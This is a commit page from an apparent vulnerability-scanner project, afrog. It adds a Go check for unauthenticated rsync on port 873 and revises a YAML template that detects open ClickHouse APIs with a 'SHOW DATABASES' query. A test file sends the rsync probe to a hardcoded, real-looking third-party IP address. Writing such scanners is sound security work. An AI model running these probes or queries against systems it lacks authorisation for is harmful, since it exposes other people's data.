crash.software
Projects
Pull Requests
Issues
Builds
afrog
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY afrog Commits dd14d918
🤬

  • add rsync unauth & update clickhouse unauth

  • Loading...
  • zan8in committed 2 years ago
    dd14d918
    1 parent 21bd6fe1
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■
    afrog-pocs/vulnerability/clickhouse-api-sql-unauth.yaml afrog-pocs/vulnerability/clickhouse-api-unauth.yaml
    1  -id: clickhouse-api-sql-unauth
     1 +id: clickhouse-api-unauth
    2 2   
    3 3  info:
    4 4   name: ClickHouse API 数据库接口未授权访问漏洞 8123端口
    skipped 3 lines
    8 8   ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据
    9 9   ClickHouse 8123端口
    10 10   "ClickHouse" && body="ok"
     11 + protocol="ClickHouse" && port="8123"
    11 12   reference:
    12 13   - http://wiki.peiqi.tech/wiki/serverapp/ClickHouse/ClickHouse%20API%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8E%A5%E5%8F%A3%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html
    13 14   - http://wiki.peiqi.tech/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.html
    skipped 2 lines
    16 17   r0:
    17 18   request:
    18 19   method: GET
     20 + path: /
     21 + expression: response.status == 200 && response.body.bcontains(b'Ok.') && response.raw_header.bcontains(b'X-ClickHouse-Summary:')
     22 + r1:
     23 + request:
     24 + method: GET
    19 25   path: /?query=SHOW%20DATABASES
    20 26   expression: response.status == 200 && response.body.bcontains(b'db_ananas') && response.body.bcontains(b'db_portrait') && response.body.bcontains(b'default') && response.body.bcontains(b'system')
    21  -expression: r0()
     27 +expression: r0() || r1()
    22 28  
  • ■ ■ ■ ■ ■
    cmd/socket/main.go
    skipped 70 lines
    71 71  }
    72 72   
    73 73  func main() {
    74  - multiTestHttp()
     74 + // multiTestHttp()
     75 + // testDialHost("47.254.87.212:873")
     76 + 
     77 + r, err := utils.Tcp("47.254.87.212:873", []byte("info\r\n"))
     78 + if err != nil {
     79 + fmt.Println(err.Error())
     80 + return
     81 + }
     82 + fmt.Println(string(r))
    75 83   
    76 84   // r, err := utils.Tcp("58.152.168.153:3306", []byte("GET /r.html HTTP/1.0\r\n\r\n"))
    77 85   // fmt.Println(string(r), err)
    skipped 2 lines
  • ■ ■ ■ ■ ■ ■
    pkg/gopoc/rsync.go
     1 +package gopoc
     2 + 
     3 +import (
     4 + "bytes"
     5 + "errors"
     6 + 
     7 + "github.com/zan8in/afrog/pkg/poc"
     8 + "github.com/zan8in/afrog/pkg/proto"
     9 + "github.com/zan8in/afrog/pkg/utils"
     10 +)
     11 + 
     12 +var (
     13 + rsyncPort = "873"
     14 + rsyncUnAuthName = "rsync-unauth"
     15 +)
     16 + 
     17 +func rsyncUnAuth(args *GoPocArgs) (Result, error) {
     18 + poc := poc.Poc{
     19 + Id: rsyncUnAuthName,
     20 + Info: poc.Info{
     21 + Name: "Rsync 未授权访问",
     22 + Author: "zan8in",
     23 + Severity: "critical",
     24 + Description: "Rsync为Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。rsync默认配置文件为/etc/rsyncd.conf,常驻模式启动命令rsync –daemon,启动成功后默认监听于TCP端口873,可通过rsync-daemon及ssh两种方式进行认证",
     25 + Reference: []string{
     26 + "http://wiki.peiqi.tech/redteam/vulnerability/unauthorized/Rsync%20873%E7%AB%AF%E5%8F%A3.html",
     27 + },
     28 + },
     29 + }
     30 + args.SetPocInfo(poc)
     31 + result := Result{Gpa: args, IsVul: false}
     32 + 
     33 + if len(args.Host) == 0 {
     34 + return result, errors.New("no host")
     35 + }
     36 + 
     37 + if len(args.Port) > 0 && args.Port != "80" && args.Port != "443" {
     38 + addr := args.Host + ":" + args.Port
     39 + payload := []byte("info\r\n")
     40 + 
     41 + resp, err := utils.Tcp(addr, payload)
     42 + if err != nil {
     43 + return result, err
     44 + }
     45 + 
     46 + if bytes.Contains(resp, []byte("@RSYNCD")) {
     47 + result.IsVul = true
     48 + url := proto.UrlType{Host: addr, Port: args.Port}
     49 + result.SetAllPocResult(true, &url, payload, resp)
     50 + return result, nil
     51 + }
     52 + }
     53 + 
     54 + addr := args.Host + ":" + rsyncPort
     55 + payload := []byte("info\r\n")
     56 + 
     57 + resp, err := utils.Tcp(addr, payload)
     58 + if err != nil {
     59 + return result, err
     60 + }
     61 + 
     62 + if bytes.Contains(resp, []byte("@RSYNCD")) {
     63 + result.IsVul = true
     64 + url := proto.UrlType{Host: addr, Port: rsyncPort}
     65 + result.SetAllPocResult(true, &url, payload, resp)
     66 + return result, nil
     67 + }
     68 + 
     69 + return result, errors.New("check result: no vul")
     70 +}
     71 + 
     72 +func init() {
     73 + GoPocRegister(rsyncUnAuthName, rsyncUnAuth)
     74 +}
     75 + 
Please wait...
Page is in error, reload to recover